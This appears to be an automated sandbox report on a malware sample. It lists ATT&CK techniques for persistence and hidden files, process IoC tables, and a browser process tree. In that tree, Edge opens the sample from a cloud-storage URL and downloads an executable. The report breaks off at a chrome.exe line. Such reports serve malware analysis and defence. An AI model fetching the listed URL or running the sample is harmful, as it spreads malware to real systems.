Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
13800	PING.EXE
23268	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 22 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
19128	schtasks.exe
19028	schtasks.exe
19588	schtasks.exe
4896	schtasks.exe
7608	schtasks.exe
10560	schtasks.exe
14408	schtasks.exe
15856	schtasks.exe
15896	schtasks.exe
4876	schtasks.exe
7420	schtasks.exe
11328	schtasks.exe
10380	schtasks.exe
6492	schtasks.exe
14848	schtasks.exe
13128	schtasks.exe
13516	schtasks.exe
14900	schtasks.exe
17568	schtasks.exe
1412	schtasks.exe
3204	schtasks.exe
14092	schtasks.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
4912	chrome.exe
4912	chrome.exe
3140	powershell.exe
3140	powershell.exe
1716	powershell.exe
1716	powershell.exe
3140	powershell.exe
1716	powershell.exe
1716	powershell.exe
3804	powershell.exe
3804	powershell.exe
5020	powershell.exe
5020	powershell.exe
3804	powershell.exe
5020	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
1176	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4912	chrome.exe
Token: SeCreatePagefilePrivilege	4912	chrome.exe
Token: SeShutdownPrivilege	4912	chrome.exe
Token: SeCreatePagefilePrivilege	4912	chrome.exe
Token: SeShutdownPrivilege	4912	chrome.exe
Token: SeCreatePagefilePrivilege	4912	chrome.exe
Token: SeDebugPrivilege	3220	firefox.exe
Token: SeDebugPrivilege	3220	firefox.exe
Token: SeShutdownPrivilege	4912	chrome.exe
Token: SeCreatePagefilePrivilege	4912	chrome.exe
Token: SeShutdownPrivilege	4912	chrome.exe
Token: SeCreatePagefilePrivilege	4912	chrome.exe
Token: SeShutdownPrivilege	4912	chrome.exe
Token: SeCreatePagefilePrivilege	4912	chrome.exe
Token: SeShutdownPrivilege	4912	chrome.exe
Token: SeCreatePagefilePrivilege	4912	chrome.exe
Token: SeShutdownPrivilege	4912	chrome.exe
Token: SeCreatePagefilePrivilege	4912	chrome.exe
Token: SeShutdownPrivilege	4912	chrome.exe
Token: SeCreatePagefilePrivilege	4912	chrome.exe
Token: SeShutdownPrivilege	4912	chrome.exe
Token: SeCreatePagefilePrivilege	4912	chrome.exe
Token: SeShutdownPrivilege	4912	chrome.exe
Token: SeCreatePagefilePrivilege	4912	chrome.exe
Token: SeShutdownPrivilege	4912	chrome.exe
Token: SeCreatePagefilePrivilege	4912	chrome.exe
Token: SeDebugPrivilege	4884	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
Token: SeDebugPrivilege	3140	powershell.exe
Token: SeDebugPrivilege	1716	powershell.exe
Token: SeIncreaseQuotaPrivilege	952	WMIC.exe
Token: SeSecurityPrivilege	952	WMIC.exe
Token: SeTakeOwnershipPrivilege	952	WMIC.exe
Token: SeLoadDriverPrivilege	952	WMIC.exe
Token: SeSystemProfilePrivilege	952	WMIC.exe
Token: SeSystemtimePrivilege	952	WMIC.exe
Token: SeProfSingleProcessPrivilege	952	WMIC.exe
Token: SeIncBasePriorityPrivilege	952	WMIC.exe
Token: SeCreatePagefilePrivilege	952	WMIC.exe
Token: SeBackupPrivilege	952	WMIC.exe
Token: SeRestorePrivilege	952	WMIC.exe
Token: SeShutdownPrivilege	952	WMIC.exe
Token: SeDebugPrivilege	952	WMIC.exe
Token: SeSystemEnvironmentPrivilege	952	WMIC.exe
Token: SeRemoteShutdownPrivilege	952	WMIC.exe
Token: SeUndockPrivilege	952	WMIC.exe
Token: SeManageVolumePrivilege	952	WMIC.exe
Token: 33	952	WMIC.exe
Token: 34	952	WMIC.exe
Token: 35	952	WMIC.exe
Token: 36	952	WMIC.exe
Token: SeDebugPrivilege	1424	tasklist.exe
Token: SeDebugPrivilege	3064	tasklist.exe
Token: SeIncreaseQuotaPrivilege	952	WMIC.exe
Token: SeSecurityPrivilege	952	WMIC.exe
Token: SeTakeOwnershipPrivilege	952	WMIC.exe
Token: SeLoadDriverPrivilege	952	WMIC.exe
Token: SeSystemProfilePrivilege	952	WMIC.exe
Token: SeSystemtimePrivilege	952	WMIC.exe
Token: SeProfSingleProcessPrivilege	952	WMIC.exe
Token: SeIncBasePriorityPrivilege	952	WMIC.exe
Token: SeCreatePagefilePrivilege	952	WMIC.exe
Token: SeBackupPrivilege	952	WMIC.exe
Token: SeRestorePrivilege	952	WMIC.exe
Token: SeShutdownPrivilege	952	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
3220	firefox.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
3220	firefox.exe
3220	firefox.exe
3220	firefox.exe
3220	firefox.exe
3220	firefox.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
1176	msedge.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe
4912	chrome.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
3220	firefox.exe
3144	Built.exe
6696	Built.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1176 wrote to memory of 4076	1176	msedge.exe	82
PID 1176 wrote to memory of 4076	1176	msedge.exe	82
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5980	1176	msedge.exe	84
PID 1176 wrote to memory of 5980	1176	msedge.exe	84
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 5076	1176	msedge.exe	83
PID 1176 wrote to memory of 4932	1176	msedge.exe	85
PID 1176 wrote to memory of 4932	1176	msedge.exe	85
PID 1176 wrote to memory of 4932	1176	msedge.exe	85
PID 1176 wrote to memory of 4932	1176	msedge.exe	85
PID 1176 wrote to memory of 4932	1176	msedge.exe	85
PID 1176 wrote to memory of 4932	1176	msedge.exe	85
PID 1176 wrote to memory of 4932	1176	msedge.exe	85
PID 1176 wrote to memory of 4932	1176	msedge.exe	85
PID 1176 wrote to memory of 4932	1176	msedge.exe	85

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 3 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
9184	attrib.exe
17992	attrib.exe
17984	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://s3.us-east-1.wasabisys.com/vxugmwdb/2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x268,0x7ff8f19cf208,0x7ff8f19cf214,0x7ff8f19cf220
  2⤵
  PID:4076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2180,i,12425270340932105694,11210409274463025426,262144 --variations-seed-version --mojo-platform-channel-handle=2168 /prefetch:2
  2⤵
  PID:5076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1776,i,12425270340932105694,11210409274463025426,262144 --variations-seed-version --mojo-platform-channel-handle=2204 /prefetch:11
  2⤵
  - Downloads MZ/PE file
  PID:5980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2444,i,12425270340932105694,11210409274463025426,262144 --variations-seed-version --mojo-platform-channel-handle=3040 /prefetch:13
  2⤵
  PID:4932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3420,i,12425270340932105694,11210409274463025426,262144 --variations-seed-version --mojo-platform-channel-handle=3436 /prefetch:1
  2⤵
  PID:4872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3424,i,12425270340932105694,11210409274463025426,262144 --variations-seed-version --mojo-platform-channel-handle=3452 /prefetch:1
  2⤵
  PID:4440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4852,i,12425270340932105694,11210409274463025426,262144 --variations-seed-version --mojo-platform-channel-handle=4896 /prefetch:14
  2⤵
  PID:5264
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4860,i,12425270340932105694,11210409274463025426,262144 --variations-seed-version --mojo-platform-channel-handle=4940 /prefetch:14
  2⤵
  PID:1960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5432,i,12425270340932105694,11210409274463025426,262144 --variations-seed-version --mojo-platform-channel-handle=5428 /prefetch:14
  2⤵
  PID:272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5592,i,12425270340932105694,11210409274463025426,262144 --variations-seed-version --mojo-platform-channel-handle=5604 /prefetch:14
  2⤵
  PID:108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=5724,i,12425270340932105694,11210409274463025426,262144 --variations-seed-version --mojo-platform-channel-handle=5732 /prefetch:1
  2⤵
  PID:236
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5880,i,12425270340932105694,11210409274463025426,262144 --variations-seed-version --mojo-platform-channel-handle=5864 /prefetch:14
  2⤵
  - NTFS ADS
  PID:244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5428,i,12425270340932105694,11210409274463025426,262144 --variations-seed-version --mojo-platform-channel-handle=5904 /prefetch:14
  2⤵
  PID:824
- - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.exe
    cookie_exporter.exe --cookie-json=1132
    3⤵
    PID:5524
- C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6424,i,12425270340932105694,11210409274463025426,262144 --variations-seed-version --mojo-platform-channel-handle=6452 /prefetch:14
  2⤵
  PID:4044
- C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6424,i,12425270340932105694,11210409274463025426,262144 --variations-seed-version --mojo-platform-channel-handle=6452 /prefetch:14
  2⤵
  PID:1760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --always-read-main-dll --field-trial-handle=3904,i,12425270340932105694,11210409274463025426,262144 --variations-seed-version --mojo-platform-channel-handle=5988 /prefetch:1
  2⤵
  PID:3552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
  2⤵
  - Drops file in Windows directory
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  PID:720
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x264,0x7ff8f19cf208,0x7ff8f19cf214,0x7ff8f19cf220
    3⤵
    PID:300
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1844,i,9162421710588311153,9215507683345292674,262144 --variations-seed-version --mojo-platform-channel-handle=2144 /prefetch:11
    3⤵
    PID:412
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2116,i,9162421710588311153,9215507683345292674,262144 --variations-seed-version --mojo-platform-channel-handle=2112 /prefetch:2
    3⤵
    PID:436
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2396,i,9162421710588311153,9215507683345292674,262144 --variations-seed-version --mojo-platform-channel-handle=3368 /prefetch:13
    3⤵
    PID:2164
- - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4280,i,9162421710588311153,9215507683345292674,262144 --variations-seed-version --mojo-platform-channel-handle=4332 /prefetch:14
    3⤵
    PID:7072
- - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4280,i,9162421710588311153,9215507683345292674,262144 --variations-seed-version --mojo-platform-channel-handle=4332 /prefetch:14
    3⤵
    PID:7044
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4512,i,9162421710588311153,9215507683345292674,262144 --variations-seed-version --mojo-platform-channel-handle=4472 /prefetch:14
    3⤵
    PID:5132

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:3140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
1⤵
PID:5312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
  2⤵
  PID:5448

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:1224
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:3220
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1968 -prefsLen 27097 -prefMapHandle 1972 -prefMapSize 270279 -ipcHandle 2044 -initialChannelId {166b6985-2487-49ca-83e4-0a30372a05fa} -parentPid 3220 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3220" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
    3⤵
    PID:4016
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2412 -prefsLen 27133 -prefMapHandle 2416 -prefMapSize 270279 -ipcHandle 2424 -initialChannelId {dfdbf3d6-d9b0-498d-86a6-ee900485228a} -parentPid 3220 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3220" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
    3⤵
    - Checks processor information in registry
    PID:4924
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3756 -prefsLen 27323 -prefMapHandle 3760 -prefMapSize 270279 -jsInitHandle 3764 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3788 -initialChannelId {fb4bce22-f6b7-4895-91ff-6f3c01e3bc37} -parentPid 3220 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3220" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
    3⤵
    - Checks processor information in registry
    PID:4232
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3968 -prefsLen 27323 -prefMapHandle 3964 -prefMapSize 270279 -ipcHandle 3752 -initialChannelId {c24e3947-47cd-4dc1-a968-8172888f5829} -parentPid 3220 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3220" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
    3⤵
    PID:3976
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4536 -prefsLen 34822 -prefMapHandle 4540 -prefMapSize 270279 -jsInitHandle 4544 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4552 -initialChannelId {e83d5318-879e-4363-9afc-f77c77b42dde} -parentPid 3220 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3220" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
    3⤵
    - Checks processor information in registry
    PID:244
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5088 -prefsLen 35010 -prefMapHandle 5092 -prefMapSize 270279 -ipcHandle 4968 -initialChannelId {11746f4e-3db2-46a7-80ac-e40b5e9322af} -parentPid 3220 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3220" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
    3⤵
    - Checks processor information in registry
    PID:6928
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5268 -prefsLen 32952 -prefMapHandle 5272 -prefMapSize 270279 -jsInitHandle 5276 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5064 -initialChannelId {f6da87d5-140c-48b6-8cbb-6220231b500a} -parentPid 3220 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3220" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
    3⤵
    - Checks processor information in registry
    PID:6304
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5292 -prefsLen 32952 -prefMapHandle 5296 -prefMapSize 270279 -jsInitHandle 5300 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5232 -initialChannelId {74333aaa-80bd-4675-9cbb-ba036771357e} -parentPid 3220 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3220" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
    3⤵
    - Checks processor information in registry
    PID:5564
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5660 -prefsLen 32952 -prefMapHandle 5664 -prefMapSize 270279 -jsInitHandle 5668 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5296 -initialChannelId {643e25fc-2026-48c9-9538-b3a9fe0e9786} -parentPid 3220 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3220" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
    3⤵
    - Checks processor information in registry
    PID:272

C:\Program Files\Google\Chrome\Application\chrome.exe
